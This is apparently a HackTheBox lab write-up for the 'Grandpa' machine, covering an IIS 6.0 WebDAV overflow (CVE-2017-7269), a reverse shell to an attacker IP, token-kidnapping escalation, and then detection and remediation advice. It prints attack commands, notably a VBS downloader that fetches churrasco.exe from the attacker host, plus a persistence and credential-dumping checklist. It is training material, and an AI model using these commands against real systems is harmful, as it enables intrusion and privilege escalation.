
HTB: Grandpa

14 min · Easy · Windows · Grandpa

A buffer overflow in IIS 6.0's WebDAV handler delivers code execution on Windows Server 2003, and token kidnapping completes the escalation to SYSTEM.

Overview

Grandpa is an Easy-rated Windows machine running Microsoft IIS 6.0 on Windows Server 2003 SP2. Port 80 is the only open port, serving the default “Under Construction” page with WebDAV enabled. No custom application is deployed; the entire attack surface is the WebDAV interface itself.

The attack chain has two stages. CVE-2017-7269, a stack buffer overflow in the ScStoragePathFromUrl function of the WebDAV PROPFIND handler, provides unauthenticated code execution as NT AUTHORITY\NETWORK SERVICE. From there, the SeImpersonatePrivilege held by the service account enables MS09-012 token kidnapping via churrasco.exe, escalating to NT AUTHORITY\SYSTEM.

The buffer overflow exploit is inherently unreliable. It succeeded on the first attempt against a fresh instance but corrupted the IIS worker process after multiple retries, requiring a box reset. Operational discipline matters here: one clean attempt, not fifteen.

Reconnaissance

I start with a service scan to identify what is listening:

nmap -sC -sV -A -T4 10.129.16.93

Port | Service | Product / Version | Notes
80 | HTTP | Microsoft IIS httpd 6.0 | WebDAV enabled, default page served

Only one port is open. The remaining 999 scanned ports are filtered, indicating a host firewall. OS detection places this on Windows Server 2003 SP2 (5.2.3790).

Nmap’s WebDAV scan reveals the full HTTP method list. PUT and DELETE appear in the public options but return 403 Forbidden when tested. PROPFIND returns 207 Multi-Status: the read path through WebDAV is accessible.

curl -sI http://10.129.16.93/
# Server: Microsoft-IIS/6.0
# MicrosoftOfficeWebServer: 5.0_Pub
# X-Powered-By: ASP.NET

The MicrosoftOfficeWebServer: 5.0_Pub header confirms WebDAV publishing extensions are active. The Last-Modified date of February 2003 confirms the default page has not been touched since OS installation.

Attack Surface Analysis

With only port 80 and no custom application, the attack surface is the IIS 6.0 WebDAV service. Write methods (PUT, DELETE) are blocked with 403 responses. PROPFIND is accessible without authentication. This narrows the search to vulnerabilities in the PROPFIND handler itself.

IIS 6.0 on Server 2003 has a substantial CVE history. The key candidate is CVE-2017-7269: a buffer overflow in ScStoragePathFromUrl triggered by a crafted If header in PROPFIND requests.

Attribute | Value
CVE | CVE-2017-7269
CVSS v3.1 | 9.8 (Critical)
CWE | CWE-119 (Buffer Overflow)
Root cause | Stack buffer overflow in ScStoragePathFromUrl parsing the PROPFIND If header
Affected | IIS 6.0 with WebDAV enabled
Fixed in | Never patched (Server 2003 EOL July 2015; CVE disclosed March 2017)
MITRE ATT&CK | T1190 (Exploit Public-Facing Application)

Microsoft never issued a patch. Windows Server 2003 reached end-of-life two years before this CVE was even disclosed. No KB article exists.

Vulnerability Analysis

The ScStoragePathFromUrl function converts URL paths from PROPFIND If headers into local storage paths using a fixed-size stack buffer. Specially crafted Unicode characters in long http:// URLs overflow this buffer, overwriting the return address and redirecting execution to attacker-controlled shellcode embedded in the same request.

The vulnerability exists in httpext.dll. The PROPFIND handler processes the If header before any authentication check, making this effectively unauthenticated.

Exploitation

I use the g0rx proof-of-concept (converted to Python 3), which constructs the malicious PROPFIND request with embedded reverse shell shellcode:

# Start listener
nc -lvnp 4444

# Send exploit
python3 exploit_grandpa.py 10.129.16.93 80 10.10.14.5 4444
connect to [10.10.14.5] from (UNKNOWN) [10.129.16.93] 1030
Microsoft Windows [Version 5.2.3790]

C:\WINDOWS\system32>whoami
nt authority\network service

The shell lands as NETWORK SERVICE. This account cannot read user profiles directly, but it holds SeImpersonatePrivilege, which is the key to escalation.

Privilege Escalation: MS09-012 Token Kidnapping

I confirm the privilege:

whoami /priv
# SeImpersonatePrivilege        Impersonate a client after authentication   Enabled

Windows Server 2003 lacks modern file transfer tools (certutil -urlcache, bitsadmin, PowerShell are all absent). I write a VBS downloader using Microsoft.XMLHTTP and ADODB.Stream to transfer churrasco.exe:

# On target: write VBS downloader line by line
echo Set o=CreateObject("Microsoft.XMLHTTP") > d.vbs
echo o.Open "GET","http://10.10.14.5:8888/churrasco.exe",False >> d.vbs
echo o.Send >> d.vbs
echo Set s=CreateObject("ADODB.Stream") >> d.vbs
echo s.Open >> d.vbs
echo s.Type=1 >> d.vbs
echo s.Write o.ResponseBody >> d.vbs
echo s.SaveToFile "C:\WINDOWS\Temp\c.exe",2 >> d.vbs
echo s.Close >> d.vbs
cscript d.vbs

Churrasco exploits MS09-012 to impersonate the SYSTEM token. Paths with spaces require 8.3 short filenames:

C:\WINDOWS\Temp>c.exe "type DOCUME~1\Harry\Desktop\user.txt"
[flag redacted]

C:\WINDOWS\Temp>c.exe "type DOCUME~1\ADMINI~1\Desktop\root.txt"
[flag redacted]

Post-Exploitation

Full SYSTEM access via churrasco. Both flags captured. The system confirms as Windows Server 2003 SP2:

systeminfo | findstr /B /C:"OS"
# OS Name:                   Microsoft Windows Server 2003 R2 Standard Edition
# OS Version:                5.2.3790 Service Pack 2 Build 3790

whoami
# nt authority\system

Two user profiles exist: Harry and Administrator. In a production environment, the post-exploitation checklist would include:

  • SAM database extraction: Dump password hashes from the registry for offline cracking
  • Cached domain credentials: Check for domain-joined status and cached logon hashes
  • Network reconnaissance: Identify internal subnets reachable from this host
  • Persistence: Create a new local administrator account, install a service backdoor, or inject an SSH public key

The VBS downloader technique is worth noting for legacy Windows environments where modern LOLBins are unavailable. The Microsoft.XMLHTTP and ADODB.Stream COM objects exist on every Windows installation from 2000 onward. Defenders monitoring for these objects being instantiated by cscript.exe or wscript.exe can detect this file transfer method.

Defensive Analysis

Detection opportunities

Phase | MITRE ATT&CK | Detection
Initial access | T1190 | IDS signature for oversized If headers in PROPFIND requests
Execution | T1059 | Process monitoring: cmd.exe spawned by w3wp.exe
Priv escalation | T1134.001 | Token impersonation: new process with SYSTEM token from NETWORK SERVICE
Defence evasion | T1027 | VBS script creation in C:\WINDOWS\Temp

Network-level: The PROPFIND request carrying the overflow payload is distinctive. The If header contains several kilobytes of encoded data that no legitimate WebDAV client would produce. Snort/Suricata rules matching oversized PROPFIND headers would catch this.
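A network-level check of the kind described above, added here as an example rather than code from the original post: it parses raw PROPFIND requests (constructed samples, not captured traffic) and flags an If header that is oversized or carries non-ASCII bytes. The 512-byte threshold is an assumption, not a published value.

```python
# Constructed sample requests (not captured traffic). The suspicious one only
# mimics the shape of the CVE-2017-7269 trigger: an If header kilobytes long
# and full of non-ASCII bytes, with no exploit payload.
BENIGN = (
    b"PROPFIND /docs/ HTTP/1.1\r\n"
    b"Host: 10.129.16.93\r\n"
    b"Depth: 1\r\n"
    b"If: <http://10.129.16.93/docs/> (<opaquelocktoken:a515cfa4-5da4-22e1-f5b5-00a0451e6bf7>)\r\n"
    b"Content-Length: 0\r\n\r\n"
)
SUSPICIOUS = (
    b"PROPFIND / HTTP/1.1\r\n"
    b"Host: 10.129.16.93\r\n"
    b"If: <http://10.129.16.93/" + b"\xc1" * 2000 + b">\r\n"
    b"Content-Length: 0\r\n\r\n"
)
MAX_IF_LEN = 512  # assumed threshold: real If headers hold a few lock tokens, not kilobytes

def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, {header: value})."""
    head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def score_propfind(raw, max_if_len=MAX_IF_LEN):
    """Return the reasons a request looks like a WebDAV If-header overflow attempt."""
    method, _path, headers = parse_request(raw)
    reasons = []
    if method.upper() != "PROPFIND" or "if" not in headers:
        return reasons
    if_hdr = headers["if"]
    if len(if_hdr) > max_if_len:
        reasons.append(f"If header is {len(if_hdr)} bytes (limit {max_if_len})")
    if any(ord(c) > 127 for c in if_hdr):
        reasons.append("If header contains non-ASCII bytes")
    return reasons

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, score_propfind(req) or "no alert")
```

The same two conditions translate directly into a Suricata rule on the PROPFIND method and If header length for live traffic.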

Host-level: Any process monitoring tool would flag cmd.exe spawned as a child of w3wp.exe. The churrasco token impersonation creates a process with a SYSTEM token from a NETWORK SERVICE parent, which is another high-fidelity detection.
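The two host-level signals just described, together with the cscript.exe/wscript.exe point from the Post-Exploitation section, as an added Python example that is not part of the original post: it walks constructed process-creation events (Sysmon/4688 style, with assumed PIDs and paths) and flags shells beneath w3wp.exe, binaries run from C:\WINDOWS\Temp, and a SYSTEM child of a NETWORK SERVICE parent.

```python
# Constructed process-creation events (Sysmon EID 1 / Security 4688 style), not
# real telemetry; PIDs, paths and users are assumed for illustration.
EVENTS = [
    {"pid": 1000, "ppid": 628,  "image": r"C:\WINDOWS\system32\svchost.exe",      "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 1480, "ppid": 1000, "image": r"C:\WINDOWS\system32\inetsrv\w3wp.exe", "user": r"NT AUTHORITY\NETWORK SERVICE"},
    {"pid": 2044, "ppid": 1480, "image": r"C:\WINDOWS\system32\cmd.exe",          "user": r"NT AUTHORITY\NETWORK SERVICE"},
    {"pid": 2100, "ppid": 2044, "image": r"C:\WINDOWS\system32\cscript.exe",      "user": r"NT AUTHORITY\NETWORK SERVICE"},
    {"pid": 2148, "ppid": 2044, "image": r"C:\WINDOWS\Temp\c.exe",                "user": r"NT AUTHORITY\NETWORK SERVICE"},
    {"pid": 2160, "ppid": 2148, "image": r"C:\WINDOWS\system32\cmd.exe",          "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 2500, "ppid": 0,    "image": r"C:\WINDOWS\explorer.exe",              "user": r"GRANDPA\Administrator"},
    {"pid": 3000, "ppid": 2500, "image": r"C:\WINDOWS\system32\cmd.exe",          "user": r"GRANDPA\Administrator"},
]
SHELLS = {"cmd.exe", "cscript.exe", "wscript.exe"}
SERVICE_ACCOUNTS = {r"nt authority\network service", r"nt authority\local service"}
TEMP_DIR = r"c:\windows\temp" + "\\"

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(by_pid, pid):
    """Image names of pid and its ancestors, nearest first; stops on unknown or cyclic pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events):
    """Return (pid, rule, reason) tuples for events matching the three host-level rules."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, parent = basename(e["image"]), by_pid.get(e["ppid"])
        # Rule 1: shell or script host anywhere beneath the IIS worker process.
        if name in SHELLS and "w3wp.exe" in ancestors(by_pid, e["ppid"]):
            alerts.append((e["pid"], "T1059", f"{name} descended from w3wp.exe"))
        # Rule 2: executable launched from the world-writable Temp directory.
        if e["image"].lower().startswith(TEMP_DIR):
            alerts.append((e["pid"], "temp-exec", f"{name} run from C:\\WINDOWS\\Temp"))
        # Rule 3: SYSTEM child of a low-privileged service account (token impersonation).
        if parent and e["user"].lower() == r"nt authority\system" \
                and parent["user"].lower() in SERVICE_ACCOUNTS:
            alerts.append((e["pid"], "T1134.001", f"SYSTEM process spawned by {parent['user']}"))
    return alerts

if __name__ == "__main__":
    for pid, rule, reason in detect(EVENTS):
        print(f"pid {pid:<5} {rule:<10} {reason}")
```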

Remediation

Priority | Action | Effort | Impact
P0 | Decommission Windows Server 2003 | High | Critical
P0 | If decommission is impossible, isolate the host on a dedicated VLAN with strict ACLs | Medium | Critical
P1 | Disable WebDAV if not required | Low | High
P1 | Remove SeImpersonatePrivilege from service accounts where impersonation is not needed | Low | High
P2 | Deploy network IDS with WebDAV protocol inspection | Medium | Medium
P3 | Implement application whitelisting to prevent execution of uploaded binaries | Medium | Medium

The core issue is the operating system. Server 2003 has been unsupported since July 2015. Every component on this host is frozen at mid-2000s patch levels. The correct remediation is decommissioning, not patching.

Key Takeaways

  1. End-of-life software creates unpatchable vulnerabilities. CVE-2017-7269 was disclosed two years after Server 2003 went EOL. No fix was ever released. Organisations running EOL systems accept the risk of zero-day vulnerabilities with no vendor response.

  2. Token impersonation is a reliable escalation path on Windows. Any service account with SeImpersonatePrivilege (NETWORK SERVICE, LOCAL SERVICE) on unpatched Windows can escalate to SYSTEM. The Potato family of tools (and churrasco for older systems) makes this trivial. Defenders should audit which accounts hold this privilege.

  3. Legacy environments require creative tooling. Without PowerShell, certutil, or bitsadmin, file transfer on Server 2003 falls back to VBS COM objects. Attackers adapt; defenders should anticipate these techniques when monitoring legacy systems.